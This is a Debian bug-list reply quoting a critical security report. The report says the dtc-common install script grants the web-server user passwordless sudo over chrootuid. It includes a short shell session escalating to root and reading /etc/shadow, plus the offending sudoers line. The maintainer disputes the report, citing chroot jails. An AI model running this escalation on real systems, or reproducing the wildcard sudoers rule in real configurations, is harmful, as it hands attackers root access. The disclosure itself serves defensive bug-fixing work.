On 08/13/2011 12:56 PM, Mike O'Connor wrote: > Package: dtc-common > Severity: critical > Tags: security > Justification: root security hole > > > the install script gives sudo access to the dtc user (the user that is running > apache) unrestricted access to chrootuid, which essentially gives root access > to the dtc account: > > root@testdtc:/var/lib/dtc/etc# su - dtc > $ whoami > dtc > $ sudo chrootuid / root /bin/bash > root@testdtc:/# whoami > root > root@testdtc:/# wc -l /etc/shadow > 27 /etc/shadow > rot@testdtc:/# grep dtc /etc/sudoers > Defaults:dtc !set_logname > dtc ALL= NOPASSWD: /usr/bin/chrootuid *
But users are jailed in a chroot when they run web scripts or shell access, so I don't see how this can happen. In their chroot they can't do that. Thomas -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
